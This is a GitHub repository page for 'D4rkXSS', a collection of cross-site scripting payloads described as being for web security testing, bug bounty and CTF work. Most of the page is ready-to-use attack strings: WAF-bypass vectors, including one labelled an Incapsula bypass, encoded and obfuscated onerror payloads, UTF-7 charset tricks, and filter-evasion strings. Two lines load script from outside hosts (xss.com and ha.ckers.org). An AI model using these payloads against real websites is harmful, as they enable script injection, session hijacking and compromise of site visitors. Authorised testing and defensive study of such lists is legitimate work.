Skip to content

R0X4R/D4rkXSS

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

32 Commits

LICENSE

LICENSE

 
 

Misc.md

Misc.md

 
 

Polygot.md

Polygot.md

 
 

README.md

README.md

 
 

basicxss.txt

basicxss.txt

 
 

brutelogic.txt

brutelogic.txt

 
 

fuzz.txt

fuzz.txt

 
 

imdge.png

imdge.png

 
 

jhaddix.txt

jhaddix.txt

 
 

mario.txt

mario.txt

 
 

noscript.txt

noscript.txt

 
 

rsnake.txt

rsnake.txt

 
 

seXSS.md

seXSS.md

 
 

Repository files navigation

D4rkXSS



All in one place for XSS.
R0X4R

Contribution

This is an open source repo. Anyone can contribute. 🍻
Coffee

Bypass WAF

NO SCRIPT

  • For Example:
    • <acronym><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
<bgsound><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
<xmp><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
">'><details/open/ontoggle=confirm('XSS')>
incapsula bypass: <iframe/onload="var b ='document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b;this['src']=a">

    Brutelogic

  • For Example:
    • \'-alert(1)//
</script><svg onload=alert(1)>
<x contenteditable onblur=alert(1)>lose focus!

    Fuzz3r

  • For Example:
    • #getURL,javascript:alert(1)",
#goto,javascript:alert(1)",	
?javascript:alert(1)",

    IMG Error

  • Encoding
    • <img onerror="location='javascript:=lert(1)'" src="x">
<img onerror="location='javascript:%61lert(1)'" src="x">
<img onerror="location='javascript:\x2561lert(1)'" src="x">
<img onerror="location='javascript:\x255Cu0061lert(1)'" src="x" >

    Jhaddix

    Jhaddix

  • For Example:
    • '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
<<scr\0ipt/src=http://xss.com/xss.js></script
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
' onmouseover=alert(/Black.Spook/)

    RSnake

    RSnake

  • For Example:
    • <SCRIPT>alert('XSS');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

    MarioXSS

    Mario

  • For Example:
    • <div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>

    Search Engine XSS

    seXSS

    Misc Payloads

    Misc

    Basic Payloads

    Basic

  • For Example:
    • <script>alert('1')</script>
"><script>alert('1')</script>
<svg/onload=alert('1');

    About

    A list of useful payloads and Bypass for Web Application Security and Bug Bounty/CTF

    github.com/R0X4R/D4rkXSS

    Topics

    javascript hacking xss-vulnerability bugbounty xss-exploitation bughunting ethical-hacking xss-filter bughunter

    Resources

    Readme

    License

    View license
    Activity

    Stars

    154 stars

    Watchers

    7 watching

    Forks

    56 forks
    Report repository